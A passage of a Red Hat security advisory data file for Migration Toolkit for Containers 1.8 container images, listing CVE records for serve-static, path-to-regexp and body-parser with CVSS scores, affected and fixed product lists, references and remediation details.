"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, { cve: "CVE-2024-45296", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-09-09T19:20:18.127723+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310908", }, ], notes: [ { category: "description", text: "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).", title: "Vulnerability description", }, { category: "summary", text: "path-to-regexp: Backtracking regular expressions cause ReDoS", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45296", }, { category: "external", summary: "RHBZ#2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45296", url: "https://www.cve.org/CVERecord?id=CVE-2024-45296", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", url: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", url: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", url: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", }, ], release_date: "2024-09-09T19:15:13.330000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "path-to-regexp: Backtracking regular expressions cause ReDoS", }, { cve: "CVE-2024-45590", cwe: { id: "CWE-405", name: "Asymmetric Resource Consumption (Amplification)", }, discovery_date: "2024-09-10T16:20:29.292154+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311171", }, ], notes: [ { category: "description", text: "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", title: "Vulnerability description", }, { category: "summary", text: "body-parser: Denial of Service Vulnerability in body-parser", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45590", }, { category: "external", summary: "RHBZ#2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45590", url: "https://www.cve.org/CVERecord?id=CVE-2024-45590", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", }, { category: "external", summary: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", url: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", }, { category: "external", summary: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", url: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", }, ], release_date: "2024-09-10T16:15:21.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", 